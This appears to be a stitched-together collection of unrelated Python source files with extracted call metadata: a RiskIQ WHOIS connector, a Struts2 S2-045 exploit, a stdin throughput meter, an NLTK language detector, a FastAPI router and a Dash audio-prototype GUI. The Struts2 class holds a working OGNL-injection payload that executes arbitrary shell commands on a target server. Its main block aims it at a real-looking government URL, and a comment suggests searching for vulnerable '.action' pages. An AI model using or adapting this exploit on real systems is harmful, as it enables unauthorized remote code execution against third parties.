rw = RiskIQWHOISIQ(config)
endpoint = 'v0/whois/address'
param_dict = {k: v for k, v in params.items() if v is not None and v != '' and v != {} and v != []}
response = rw.make_api_call(endpoint=endpoint, params=param_dict)
return response
def get_domain(config, params):
rw = RiskIQWHOISIQ(config)
endpoint = 'v0/whois/domain'
param_dict = {k: v for k, v in params.items() if v is not None and v != '' and v != {} and v != []}
response = rw.make_api_call(endpoint=endpoint, params=param_dict)
return response
def get_email(config, params):
rw = RiskIQWHOISIQ(config)
endpoint = 'v0/whois/email'
param_dict = {k: v for k, v in params.items() if v is not None and v != '' and v != {} and v != []}
response = rw.make_api_call(endpoint=endpoint, params=param_dict)
return response
def get_name(config, params):
rw = RiskIQWHOISIQ(config)
endpoint = 'v0/whois/name'
param_dict = {k: v for k, v in params.items() if v is not None and v != '' and v != {} and v != []}
response = rw.make_api_call(endpoint=endpoint, params=param_dict)
return response
def get_name_server(config, params):
rw = RiskIQWHOISIQ(config)
endpoint = 'v0/whois/nameserver'
param_dict = {k: v for k, v in params.items() if v is not None and v != '' and v != {} and v != []}
response = rw.make_api_call(endpoint=endpoint, params=param_dict)
return response
def get_org(config, params):
rw = RiskIQWHOISIQ(config)
endpoint = 'v0/whois/org'
param_dict = {k: v for k, v in params.items() if v is not None and v != '' and v != {} and v != []}
response = rw.make_api_call(endpoint=endpoint, params=param_dict)
return response
def get_phone(config, params):
rw = RiskIQWHOISIQ(config)
endpoint = 'v0/whois/phone'
param_dict = {k: v for k, v in params.items() if v is not None and v != '' and v != {} and v != []}
response = rw.make_api_call(endpoint=endpoint, params=param_dict)
return response
def _check_health(config):
try:
rw = RiskIQWHOISIQ(config)
endpoint = 'v0/whois/domain'
params = {'domain': 'google.com'}
response = rw.make_api_call(endpoint=endpoint, params=params)
if response:
logger.info('connector available')
return True
except Exception as err:
logger.exception(str(err))
raise ConnectorError(str(err))
operations = {
'get_address': get_address,
'get_domain': get_domain,
'get_email': get_email,
'get_name': get_name,
'get_name_server': get_name_server,
'get_org': get_org,
'get_phone': get_phone
}
| [
"connectors.core.connector.ConnectorError",
"connectors.core.connector.get_logger",
"requests.request"
] | [((272, 300), 'connectors.core.connector.get_logger', 'get_logger', (['"""riskiq-whoisiq"""'], {}), "('riskiq-whoisiq')\n", (282, 300), False, 'from connectors.core.connector import ConnectorError, get_logger\n'), ((1137, 1237), 'requests.request', 'requests.request', (['method', 'url'], {'params': 'params', 'data': 'data', 'headers': 'headers', 'verify': 'self.verify_ssl'}), '(method, url, params=params, data=data, headers=headers,\n verify=self.verify_ssl)\n', (1153, 1237), False, 'import requests\n'), ((1401, 1487), 'connectors.core.connector.ConnectorError', 'ConnectorError', (["{'status_code': response.status_code, 'message': response.reason}"], {}), "({'status_code': response.status_code, 'message': response.\n reason})\n", (1415, 1487), False, 'from connectors.core.connector import ConnectorError, get_logger\n'), ((1546, 1597), 'connectors.core.connector.ConnectorError', 'ConnectorError', (['"""SSL certificate validation failed"""'], {}), "('SSL certificate validation failed')\n", (1560, 1597), False, 'from connectors.core.connector import ConnectorError, get_logger\n'), ((1667, 1744), 'connectors.core.connector.ConnectorError', 'ConnectorError', (['"""The request timed out while trying to connect to the server"""'], {}), "('The request timed out while trying to connect to the server')\n", (1681, 1744), False, 'from connectors.core.connector import ConnectorError, get_logger\n'), ((1811, 1897), 'connectors.core.connector.ConnectorError', 'ConnectorError', (['"""The server did not send any data in the allotted amount of time"""'], {}), "(\n 'The server did not send any data in the allotted amount of time')\n", (1825, 1897), False, 'from connectors.core.connector import ConnectorError, get_logger\n'), ((1963, 2012), 'connectors.core.connector.ConnectorError', 'ConnectorError', (['"""Invalid endpoint or credentials"""'], {}), "('Invalid endpoint or credentials')\n", (1977, 2012), False, 'from connectors.core.connector import ConnectorError, get_logger\n')] |
import http.client
import urllib
import requests
from scripts.poc.poc_interface import PocInterface
class Structs2_45(PocInterface):
'''
Structs2 漏洞验证及利用实现
'''
def validate(self,url):
'''
验证指定URL是否存在Structs2 45漏洞
:param url: 需要验证的URL地址
:return: True-存在漏洞 False-不存在漏洞
'''
payload = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(#ros.println(102*102*102*99)).(#ros.flush())}"
headers = {}
headers["Content-Type"] = payload
r = requests.get(url, headers=headers)
if "105059592" in r.content:
return True
return False
def exploit(self,url, cmd):
'''
对存在Struct2 45漏洞的主机实现任意命令执行
:param url: 目标URL
:param cmd: 需要执行的指令
:return: 执行后的返回页面内容
'''
payload = "%{(#_='multipart/form-data')."
payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
payload += "(#_memberAccess?"
payload += "(#_memberAccess=#dm):"
payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
payload += "(#ognlUtil.getExcludedPackageNames().clear())."
payload += "(#ognlUtil.getExcludedClasses().clear())."
payload += "(#context.setMemberAccess(#dm))))."
payload += "(#cmd='%s')." % cmd
payload += "(#iswin=(@java.<EMAIL>.System@getProperty('os.name').toLowerCase().contains('win')))."
payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
payload += "(#ros.flush())}"
try:
headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
request = urllib.Request(url, headers=headers)
page = urllib.urlopen(request).read()
except http.client.IncompleteRead as e:
page = e.partial
print(page)
return page
if __name__ == '__main__':
s=Structs2_45()
#查找潜在漏洞URL,直接谷歌 inurl .action
url="http://www.ly.gov.tw/innerIndex.action"
if s.validate(url):
s.exploit(url,'ls -lht') | [
"urllib.urlopen",
"requests.get",
"urllib.Request"
] | [((947, 981), 'requests.get', 'requests.get', (['url'], {'headers': 'headers'}), '(url, headers=headers)\n', (959, 981), False, 'import requests\n'), ((2539, 2575), 'urllib.Request', 'urllib.Request', (['url'], {'headers': 'headers'}), '(url, headers=headers)\n', (2553, 2575), False, 'import urllib\n'), ((2595, 2618), 'urllib.urlopen', 'urllib.urlopen', (['request'], {}), '(request)\n', (2609, 2618), False, 'import urllib\n')] |
#!/usr/bin/env python3
'''
Continuously reads data on stdin until there is no more data. Records how many
bytes there were and how long it took to read them. Prints this information.
'''
import time
import sys
import threading
write_lock = threading.Lock()
thread_done = threading.Event()
def report(stop_ev, start_time, last_byte_count):
if stop_ev.is_set():
thread_done.set()
return
global byte_count
b = byte_count - last_byte_count
t = time.time() - start_time
r = b / t * 8 / 1000 / 1000
with write_lock:
print(
'%d bytes in %f seconds (%0.2f Mbps)' % (b, t, r),
file=sys.stderr)
threading.Timer(1, report, [stop_ev, time.time(), byte_count]).start()
# Don't record the start time until we've read the first byte
fd = open('/dev/stdin', 'rb')
fd.read(1)
byte_count = 1
stop_ev = threading.Event()
threading.Timer(1, report, [stop_ev, time.time(), byte_count]).start()
start = time.time()
# Keep reading until no more data
data = 'foo'
try:
while data:
data = fd.read(4096)
byte_count += len(data)
except KeyboardInterrupt:
# print('')
pass
finally:
stop_ev.set()
thread_done.wait()
# Print stats
end = time.time()
duration = end - start
rate = byte_count / duration * 8 / 1000 / 1000
with write_lock:
print('OVERALL: %d bytes in %0.2f seconds (%0.2f Mbps)' %\
(byte_count, duration, rate), file=sys.stderr)
sys.stderr.flush()
fd.close()
| [
"threading.Event",
"threading.Lock",
"sys.stderr.flush",
"time.time"
] | [((241, 257), 'threading.Lock', 'threading.Lock', ([], {}), '()\n', (255, 257), False, 'import threading\n'), ((272, 289), 'threading.Event', 'threading.Event', ([], {}), '()\n', (287, 289), False, 'import threading\n'), ((863, 880), 'threading.Event', 'threading.Event', ([], {}), '()\n', (878, 880), False, 'import threading\n'), ((960, 971), 'time.time', 'time.time', ([], {}), '()\n', (969, 971), False, 'import time\n'), ((1218, 1229), 'time.time', 'time.time', ([], {}), '()\n', (1227, 1229), False, 'import time\n'), ((1435, 1453), 'sys.stderr.flush', 'sys.stderr.flush', ([], {}), '()\n', (1451, 1453), False, 'import sys\n'), ((474, 485), 'time.time', 'time.time', ([], {}), '()\n', (483, 485), False, 'import time\n'), ((918, 929), 'time.time', 'time.time', ([], {}), '()\n', (927, 929), False, 'import time\n'), ((700, 711), 'time.time', 'time.time', ([], {}), '()\n', (709, 711), False, 'import time\n')] |
# -*- coding: utf-8 -*-
# Aufgaben 6, 7, 20, 21, 24, 30, 34, 39, 38, 41, 43 <NAME>
# -----------------
# 43 detect language
# -----------------
import nltk, re
from nltk import word_tokenize
languages = ['Chickasaw', 'English', 'German_Deutsch', 'Greenlandic_Inuktikut', 'Hungarian_Magyar', 'Ibibio_Efik']
def word_frequency(text):
tokens = text
if type(text) == type(str('')):
tokens = word_tokenize(text)
freq = nltk.FreqDist(w.lower() for w in tokens)
return freq
def get_lang_list():
language_list = {}
for language in languages:
reference_text = nltk.corpus.udhr.words(language + '-Latin1')
language_words = word_frequency(reference_text).most_common()
language_list[language] = [word[0] for word in language_words if re.findall(r'\w', word[0])]
return language_list
def which_lang(string):
input_text = word_frequency(string).most_common()
input_text_list = [word[0] for word in input_text if re.findall(r'\w', word[0])]
language_list = get_lang_list()
result = {}
for lang in languages:
result[lang] = len(list(set(input_text_list) & set(language_list[lang])))
return 'Your Text is written in "{}"'.format(max(result, key=result.get))
input_txt = {
'german': 'Auch gibt es niemanden, der den Schmerz an sich liebt, sucht oder wünscht, nur, weil er Schmerz ist, es sei denn, es kommt zu zufälligen Umständen, in denen Mühen und Schmerz ihm große Freude bereiten können. Um ein triviales Beispiel zu nehmen, wer von uns unterzieht sich je anstrengender körperlicher Betätigung, außer um Vorteile daraus zu ziehen? Aber wer hat irgend ein Recht, einen Menschen zu tadeln, der die Entscheidung trifft, eine Freude zu genießen, die keine unangenehmen Folgen hat, oder einen, der Schmerz vermeidet, welcher keine daraus resultierende Freude nach sich zieht? Auch gibt es niemanden, der den Schmerz an sich liebt, sucht oder wünscht, nur, weil er Schmerz ist, es sei denn, es kommt zu zufälligen Umständen, in denen Mühen und Schmerz ihm große Freude bereiten können. Um ein triviales Beispiel zu nehmen, wer von uns unterzieht sich je anstrengender körperlicher Betätigung, außer um Vorteile daraus zu ziehen?',
'english': 'A wonderful serenity has taken possession of my entire soul, like these sweet mornings of spring which I enjoy with my whole heart. I am alone, and feel the charm of existence in this spot, which was created for the bliss of souls like mine. I am so happy, my dear friend, so absorbed in the exquisite sense of mere tranquil existence, that I neglect my talents. I should be incapable of drawing a single stroke at the present moment; and yet I feel that I never was a greater artist than now. When, while the lovely valley teems with vapour around me, and the meridian sun strikes the upper surface of the impenetrable foliage of my trees, and but a few stray gleams steal into the inner sanctuary, I throw myself down among the tall grass by the trickling stream; and, as I lie close to the earth, a thousand unknown plants are noticed by me.'
}
print(which_lang(input_txt['english']))
| [
"nltk.corpus.udhr.words",
"re.findall",
"nltk.word_tokenize"
] | [((407, 426), 'nltk.word_tokenize', 'word_tokenize', (['text'], {}), '(text)\n', (420, 426), False, 'from nltk import word_tokenize\n'), ((597, 641), 'nltk.corpus.udhr.words', 'nltk.corpus.udhr.words', (["(language + '-Latin1')"], {}), "(language + '-Latin1')\n", (619, 641), False, 'import nltk, re\n'), ((976, 1002), 're.findall', 're.findall', (['"""\\\\w"""', 'word[0]'], {}), "('\\\\w', word[0])\n", (986, 1002), False, 'import nltk, re\n'), ((785, 811), 're.findall', 're.findall', (['"""\\\\w"""', 'word[0]'], {}), "('\\\\w', word[0])\n", (795, 811), False, 'import nltk, re\n')] |
from fastapi import APIRouter, Request
from starlette.status import HTTP_200_OK
from deciphon_api.api import dbs, hmms, jobs, prods, scans, sched, seqs
from deciphon_api.core.responses import PrettyJSONResponse
router = APIRouter()
router.include_router(dbs.router)
router.include_router(hmms.router)
router.include_router(jobs.router)
router.include_router(prods.router)
router.include_router(scans.router)
router.include_router(sched.router)
router.include_router(seqs.router)
@router.get(
"/",
summary="list of all endpoints",
response_class=PrettyJSONResponse,
status_code=HTTP_200_OK,
name="root:list-of-endpoints",
)
def root(request: Request):
routes = sorted(request.app.routes, key=lambda x: x.name)
urls = {route.name: route.path for route in routes}
return PrettyJSONResponse(urls)
| [
"fastapi.APIRouter",
"deciphon_api.core.responses.PrettyJSONResponse"
] | [((222, 233), 'fastapi.APIRouter', 'APIRouter', ([], {}), '()\n', (231, 233), False, 'from fastapi import APIRouter, Request\n'), ((805, 829), 'deciphon_api.core.responses.PrettyJSONResponse', 'PrettyJSONResponse', (['urls'], {}), '(urls)\n', (823, 829), False, 'from deciphon_api.core.responses import PrettyJSONResponse\n')] |
import numpy as np
from io import BytesIO
import wave
import struct
from dcase_models.util.gui import encode_audio
#from .utils import save_model_weights,save_model_json, get_data_train, get_data_test
#from .utils import init_model, evaluate_model, load_scaler, save, load
#from .model import debugg_model, prototype_loss,prototypeCNN_maxpool
#from .prototypes import Prototypes
import os
from keras.callbacks import ModelCheckpoint,CSVLogger
from keras.optimizers import Adam
import keras.backend as K
import dash
from dash.dependencies import Input, Output
import dash_html_components as html
import dash_core_components as dcc
import dash_audio_components
import plotly.graph_objects as go
import plotly.express as px
from plotly.subplots import make_subplots
import librosa
import sys
from dcase_models.util.files import save_pickle, load_pickle
from dcase_models.util.data import get_fold_val
#from dcase_models.model.model import debugg_model, modelAPNet
colors = ['#1f77b4',
'#ff7f0e',
'#2ca02c',
'#d62728',
'#9467bd',
'#8c564b',
'#e377c2',
'#7f7f7f',
'#bcbd22',
'#17becf']
class_names = (['air conditioner', 'car horn', 'children playing',
'dog bark', 'drilling', 'engine idling', 'gun shot',
'jack- hammer', 'siren', 'street music'])
class_names2 = (['air<br>conditioner', 'car<br>horn', 'children<br>playing',
'dog<br>bark', 'drilling', 'engine<br>idling', 'gun<br>shot',
'jack-<br>hammer', 'siren', 'street<br>music'])
class_names_av = ['AC', 'CH', 'CP', 'DB', 'DR', 'EI', 'GS', 'JA', 'SI', 'SM']
#from audio_prototypes.utils import load_training_log
from shutil import copyfile
import matplotlib.pyplot as plt
cm = plt.get_cmap('viridis')
def generate_figure2D(model_container, selectedpoints=[],
x_select=0, y_select=1, samples_per_class=10,
label_list=[]):
prototypes_feat,prototypes_mel,protoypes2D,prototypes_classes,_ = model_container.prototypes.get_all_instances()
n_classes = len(label_list) if len(label_list) > 0 else 10
prototype_ixs = np.arange(0,len(prototypes_feat))
x = []
y = []
classes = []
classes_ix = []
prototypes_ixs = []
for class_ix in range(n_classes):
prototypes_class_ix = protoypes2D[prototypes_classes == class_ix]
prototype_ixs_class = prototype_ixs[prototypes_classes == class_ix]
#print(prototypes_class_ix.shape)
xj = []
yj = []
classesj = []
for j in range(len(prototypes_class_ix)):
xj.append(prototypes_class_ix[j, x_select])
yj.append(prototypes_class_ix[j, y_select])
classesj.append('prototype'+str(prototype_ixs_class[j]))
# classes_ix.append(int(prototypes_classes[j]))
x.append(xj)
y.append(yj)
classes.append(classesj)
prototypes_ixs.append(prototype_ixs_class)
centers_feat,centers_mel,centers2D,centers_classes,centers_audio,centers_file_names = model_container.data_instances.get_all_instances()
centers_ixs = np.arange(0,len(centers2D))
x_centers = []
y_centers = []
classes_centers = []
classes_ix_centers = []
### Add this to tests. Delete!!!
#centers2D = self.model_containers[self.fold_test].data_instances.X_feat_2D['X']#self.X_2D[self.fold_test]['X']
#centers_classes = self.model_containers[self.fold_test].data_instances.X_feat_2D['Y']
#centers_ixs = np.arange(0,len(centers2D))
for class_ix in range(n_classes):
centers_class_ix = centers2D[centers_classes == class_ix]
centers_ixs_class = centers_ixs[centers_classes == class_ix]
xj = []
yj = []
classesj = []
for j in range(len(centers_class_ix)):
xj.append(centers_class_ix[j, x_select])
yj.append(centers_class_ix[j, y_select])
classesj.append('center'+str(centers_ixs_class[j]))
# classes_ix.append(int(prototypes_classes[j]))
x_centers.append(xj)
y_centers.append(yj)
classes_centers.append(classesj)
fig = make_subplots(rows=1, cols=1)#, column_widths=[0.8, 0.2])
size = 10
proto_list = []
for label in label_list:
proto_list.append(label + ' (protos.)')
for j in range(n_classes):
s = min(samples_per_class,len(x_centers[j]))
selectedpoints_j = None
if len(selectedpoints) > 0:
proto_ixs = prototypes_ixs[j]
selectedpoints_j = []
for point in selectedpoints:
if point in proto_ixs:
point_i = [i for i,x in enumerate(proto_ixs) if point == x][0]
selectedpoints_j.append(point_i)
fig.add_trace(
go.Scatter(
x=x[j], y=y[j], text=classes[j], name=proto_list[j],
mode='markers',selectedpoints=selectedpoints_j,
marker={'size': size, 'symbol':'cross', 'color':colors[j%10]}),
row=1, col=1
)
fig.add_trace(
go.Scatter(
x=x_centers[j][:s], y=y_centers[j][:s],
text=classes_centers[j][:s], name=label_list[j],
selectedpoints=None,mode='markers',
marker={'size': 5, 'color':colors[j%10], 'opacity':0.6}),
row=1, col=1
)
# if len(selectedpoints) == 0:
# fig.add_trace(go.Scatter(x=x[j], y=y[j],text=classes[j], name= label_list[j],mode='markers',marker={'size': size, 'symbol':'cross', 'color':colors[j]}), row=1, col=1)
# fig.add_trace(go.Scatter(x=x_centers[j][:s], y=y_centers[j][:s],text=classes_centers[j][:s], name= label_list[j],mode='markers',marker={'size': 6,'color':colors[j],'opacity':0.7}), row=1, col=1)
# else:
# proto_ixs = prototypes_ixs[j]
# selectedpoints_j = []
# for point in selectedpoints:
# if point in proto_ixs:
# point_i = [i for i,x in enumerate(proto_ixs) if point == x][0]
# selectedpoints_j.append(point_i)
# fig.add_trace(go.Scatter(x=x[j], y=y[j],text=classes[j], name=label_list[j],mode='markers',selectedpoints=selectedpoints_j,marker={'size': size, 'symbol':'cross', 'color':colors[j]}), row=1, col=1)
# fig.add_trace(go.Scatter(x=x_centers[j][:s], y=y_centers[j][:s],text=classes_centers[j][:s], name=label_list[j],selectedpoints=[],mode='markers',marker={'size': 6,'color':colors[j],'opacity':0.7}), row=1, col=1)
fig.update_layout()
components_dict = {0: 'First', 1: 'Second', 2: 'Third', 3: 'Fourth'}
fig.update_layout(
title="Prototypes and data instances in the 2D space (PCA)",
xaxis_title=components_dict[x_select] + " principal component (x)",
yaxis_title=components_dict[y_select] + " principal component (y)",
clickmode='event+select',
uirevision=True,
width=1000,
height=600,
)
return fig
def generate_figure_weights(model_container, selected=None, label_list=class_names):
fig_weights = go.Figure(
px.imshow(model_container.prototypes.W_dense.T,origin='lower'),
layout=go.Layout(title=go.layout.Title(text="A Bar Chart"))
)
fig_weights.update_traces(dict( showscale=False, colorbar_len=0.1,
coloraxis=None), selector={'type':'heatmap'})
#fig_weights.update_traces(showscale=False)
fig_weights.update_layout(clickmode='event+select')
if selected is not None:
fig_weights.add_trace(go.Scatter(x=[selected],y=[1]))
_,_,_,prototypes_classes,_ = model_container.prototypes.get_all_instances()
xticks = []
for j in range(len(label_list)):
tickj = np.mean(np.argwhere(np.array(prototypes_classes) == j))
xticks.append(tickj)
fig_weights.update_layout(
title="Weights of the last fully-connected layer",
xaxis_title="Prototypes",
yaxis_title="Classes",
#margin = {'l': 10, 'b': 10, 't': 10, 'r': 10},
xaxis = dict(
tickmode = 'array',
tickvals = xticks,
ticktext = label_list #class_names2
),
yaxis = dict(
tickmode = 'array',
tickvals = [i for i in range(len(class_names))],
ticktext = label_list #class_names
),
width=1000,
height=300,
)
return fig_weights
def generate_figure_mel(mel_spec):
figure = go.Figure(px.imshow(mel_spec.T,origin='lower'),layout=go.Layout(title=go.layout.Title(text="A Bar Chart")))
figure.update_traces(dict( showscale=False, colorbar_len=0.1,
coloraxis=None), selector={'type':'heatmap'})
figure.update_layout(
title="Mel-spectrogram",
xaxis_title="Time (hops)",
yaxis_title="Mel filter index",
#margin = {'l': 0, 'b': 0, 't': 40, 'r': 10}
)
#figure.layout.coloraxis.showscale = False
return figure
class GUI():
def __init__(self, model_containers, data, folds_files, exp_folder_input, exp_folder_output, label_list, params, plot_label_list=None,graph=None):
self.model_containers = model_containers
self.data = data
self.folds_files = folds_files
self.exp_folder_input = exp_folder_input
self.exp_folder_output = exp_folder_output
self.label_list = label_list
self.params = params
if plot_label_list is None:
self.plot_label_list = label_list
else:
self.plot_label_list = plot_label_list
self.graph = graph
self.fold_list = list(model_containers.keys())
self.fold_test = self.fold_list[0]
self.fold_val = get_fold_val(self.fold_test, self.fold_list)
self.samples_per_class = 10
self.x_select = 0
self.y_select = 1
self.click_timestamps = [0,0,0]
self.generate_figure2D()
self.generate_figure_weights()
def generate_layout(self, app):
import tensorflow as tf
external_stylesheets = [
'https://codepen.io/chriddyp/pen/bWLwgP.css',
{
'href': 'https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/css/bootstrap.min.css',
'rel': 'stylesheet',
'integrity': '<KEY>',
'crossorigin': 'anonymous'
} ]
self.app = app
self.graph = tf.get_default_graph()
self.generate_figure2D()
self.generate_figure_weights()
plot2D = dcc.Graph(id='plot2D', figure=self.figure,
style={"height" : "100%", "width" : "100%"})
_,center_mel_blank,_,_,_,_ = self.model_containers[self.fold_test].data_instances.get_instance_by_index(0)
plot_mel = dcc.Graph(id="plot_mel",
figure = self.generate_figure_mel(center_mel_blank),
style={"width": "70%", "display": "inline-block",'float':'left'}
)
plot_weights = dcc.Graph(id="plot_weights",
figure = self.fig_weigths,
style={"width": "100%", "display": "inline-block"}
)
audio = dash_audio_components.DashAudioComponents(id='audio-player', src="",
autoPlay=False, controls=True)
button_delete = html.Button('Delete prototype',id='delete_and_convert', className='button',n_clicks_timestamp=0,style={'display':'none','width':'70%'})
button_eval = html.Button('Evaluate model',id='eval', className='button',n_clicks_timestamp=0,style={'width':'70%'})
button_load = html.Button('Load best weigths',id='load_weigths', className='button',n_clicks_timestamp=0,style={'width':'70%'})
button_train = html.Button('Train model',id='train', className='button',n_clicks_timestamp=0,style={'width':'70%'})
button_reset = html.Button('Reset model',id='reset', className='button',n_clicks_timestamp=0,style={'width':'70%'})
output_eval = html.Div(id='output_eval',style={'width':'20%'})
output_text = html.Div(id='output_text')
output_interval = html.Div(id='output_interval')
input_epochs = dcc.Input(id="input_epochs", type="number", placeholder="epochs",min=1, max=100, step=1,style={'width':'33%'})#,value=10)
input_lr = dcc.Input(id="learning_rate", type="number", placeholder="learning_rate",min=0.0000001, max=1,style={'width':'33%'})
input_bs = dcc.Input(id="batch_size", type="number", placeholder="batch_size",min=32, max=512, step=32,style={'width':'33%'})#,value=64)
slider_samples = html.Div(dcc.Slider(id='samples_per_class',min=1,max=500, step=1,value=10,vertical=False),style={'width':'100%'})
interval = dcc.Interval(id='interval-component', interval=1*1000, # in milliseconds
n_intervals=0)
options = []
for fold in self.fold_list:
option = {'value': fold, 'label': fold}
options.append(option)
fold_select = dcc.Dropdown(id='fold_select',options=options,value=self.fold_test,style={'width':'85%'})
#model_select = dcc.Dropdown(id='model_select',options=available_models,value=model_input_name,style={'width':'85%'})
#input_model_output = dcc.Input(id="input_model_output", type="text", placeholder="model output",style={'width':'70%'},value=model_output_name)#,value=64)
options = []
for j in range(4):
options.append({'label':'component '+str(j+1),'value':j})
x_select = dcc.Dropdown(id='x_select',options=options,value=0,style={'width': '80%'})
y_select = dcc.Dropdown(id='y_select',options=options,value=1,style={'width': '80%'})
eval_div = html.Div([button_eval,output_eval],style={'columnCount': 2,'width':'50%'})
train_div = html.Div([input_epochs,input_lr,input_bs],style={'width':'70%'})#,style={'columnCount': 4,'width':'80%'})
model_div = html.Div([fold_select],style={'columnCount': 3,'width':'80%'})
model_prop_div = html.Div([button_load,button_reset],style={'columnCount': 2,'width':'50%'})
#self.app.layout = html.Div([ html.Div([plot_mel, graph2,plot_weights ], className="nine columns",style={'height':'80vh'}) ])
self.app.layout = html.Div([
html.Div([
html.Div([x_select], className="two columns",style={'display': 'flex', 'align-items': 'center', 'justify-content': 'center'}),
html.Div([y_select], className="two columns",style={'display': 'flex', 'align-items': 'center', 'justify-content': 'center'}),
html.Div([slider_samples], className="three columns",style={'display': 'flex', 'align-items': 'center', 'justify-content': 'center'}),
], className="row", style={'height':'10vh'}),
html.Div([
#html.Div([slider_samples], className="one column"),
html.Div([plot2D], className="nine columns",style={'height':'80vh'}),
html.Div([plot_mel,html.Br(),audio,html.Br(),button_delete,html.Br(),button_eval,html.Br(),output_eval,html.Br(),button_load,html.Br(),
button_reset,html.Br(),button_train,html.Br(),train_div,html.Br(),
html.Br(),fold_select, #model_select,input_model_output
html.Br(),html.Br(),output_text,interval], className="three columns"),
], className="row", style={'height':'80vh'}),
# html.Div([
# html.Div([slider_samples], className="nine columns", style={'align':'center'})
# ], className="row"),
html.Div([
# html.Div([], className="two columns"),
html.Div([plot_weights], className="six columns"),
#html.Div([graph_log], className="six columns")
], className="row", style={'height':'30vh'})
])
def generate_figure2D(self,selectedpoints=[]):
prototypes_feat,prototypes_mel,protoypes2D,prototypes_classes,_ = self.model_containers[self.fold_test].prototypes.get_all_instances()
prototype_ixs = np.arange(0,len(prototypes_feat))
x = []
y = []
classes = []
classes_ix = []
prototypes_ixs = []
for class_ix in range(10):
prototypes_class_ix = protoypes2D[prototypes_classes == class_ix]
prototype_ixs_class = prototype_ixs[prototypes_classes == class_ix]
xj = []
yj = []
classesj = []
for j in range(len(prototypes_class_ix)):
xj.append(prototypes_class_ix[j,self.x_select])
yj.append(prototypes_class_ix[j,self.y_select])
classesj.append('prototype'+str(prototype_ixs_class[j]))
# classes_ix.append(int(prototypes_classes[j]))
x.append(xj)
y.append(yj)
classes.append(classesj)
prototypes_ixs.append(prototype_ixs_class)
centers_feat,centers_mel,centers2D,centers_classes,centers_audio,centers_file_names = self.model_containers[self.fold_test].data_instances.get_all_instances()
centers_ixs = np.arange(0,len(centers2D))
x_centers = []
y_centers = []
classes_centers = []
classes_ix_centers = []
### Add this to tests. Delete!!!
#centers2D = self.model_containers[self.fold_test].data_instances.X_feat_2D['X']#self.X_2D[self.fold_test]['X']
#centers_classes = self.model_containers[self.fold_test].data_instances.X_feat_2D['Y']
#centers_ixs = np.arange(0,len(centers2D))
for class_ix in range(10):
centers_class_ix = centers2D[centers_classes == class_ix]
centers_ixs_class = centers_ixs[centers_classes == class_ix]
xj = []
yj = []
classesj = []
for j in range(len(centers_class_ix)):
xj.append(centers_class_ix[j,self.x_select])
yj.append(centers_class_ix[j,self.y_select])
classesj.append('center'+str(centers_ixs_class[j]))
# classes_ix.append(int(prototypes_classes[j]))
x_centers.append(xj)
y_centers.append(yj)
classes_centers.append(classesj)
fig = make_subplots(rows=1, cols=1)#, column_widths=[0.8, 0.2])
size = 12
for j in range(10):
s = min(self.samples_per_class,len(x_centers[j]))
print(s,self.samples_per_class,len(x_centers[j]))
if len(selectedpoints) == 0:
fig.add_trace(go.Scatter(x=x[j], y=y[j],text=classes[j], name=self.label_list[j],mode='markers',marker={'size': size, 'symbol':'cross', 'color':colors[j]}), row=1, col=1)
fig.add_trace(go.Scatter(x=x_centers[j][:s], y=y_centers[j][:s],text=classes_centers[j][:s], name=self.label_list[j],mode='markers',marker={'size': 6,'color':colors[j],'opacity':0.7}), row=1, col=1)
else:
proto_ixs = prototypes_ixs[j]
selectedpoints_j = []
for point in selectedpoints:
if point in proto_ixs:
print(point,proto_ixs)
point_i = [i for i,x in enumerate(proto_ixs) if point == x][0]
selectedpoints_j.append(point_i)
fig.add_trace(go.Scatter(x=x[j], y=y[j],text=classes[j], name=self.label_list[j],mode='markers',selectedpoints=selectedpoints_j,marker={'size': size, 'symbol':'cross', 'color':colors[j]}), row=1, col=1)
fig.add_trace(go.Scatter(x=x_centers[j][:s], y=y_centers[j][:s],text=classes_centers[j][:s], name=self.label_list[j],selectedpoints=[],mode='markers',marker={'size': 6,'color':colors[j],'opacity':0.7}), row=1, col=1)
fig.update_layout()
components_dict = {0: 'First', 1: 'Second', 2: 'Third', 3: 'Fourth'}
fig.update_layout(
title="Prototypes and k-means centers in the 2D space (PCA)",
xaxis_title=components_dict[self.x_select] + " principal component (x)",
yaxis_title=components_dict[self.y_select] + " principal component (y)",
clickmode='event+select',uirevision=True
)
self.figure = fig
return fig
def generate_figure_training(self):
data = []
weights_folder = os.path.join(self.weights_folder, self.model_output_name)
if len(self.training_logs) > 0:
for j,training_log in enumerate(self.training_logs[self.fold_test]):
#print(training_log)
epochs,val_acc,name = training_log['epochs'],training_log['val_acc'],training_log['name']
if training_log['training'] == True:
epochs, val_acc = load_training_log(weights_folder,self.fold_test,row_ix=11)
if len(epochs) > 0:
best = 0
for val in val_acc:
if float(val)>best:
best = float(val)
data.append({'x':epochs,'y': val_acc,'name': name,'mode': 'markers','marker': {'size': 8, 'color': colors[j]}}) #'val_acc_'+
data.append({'x':[epochs[0],epochs[-1]],'y': [best,best],'name': 'best_'+name,'mode': 'lines','marker': {'color': colors[j]}}) #'best_val_acc_'+
self.figure_training = go.Figure(data=data)
self.figure_training.update_layout(
title="Accuracy on the validation set",
xaxis_title="Accuracy",
yaxis_title="Number of epochs",
clickmode= 'event+select',uirevision=True
)
else:
self.figure_training = go.Figure(data={'x':[0],'y': [0]})
self.figure_training.update_layout(
title="Accuracy on the validation set",
xaxis_title="Accuracy",
yaxis_title="Number of epochs",
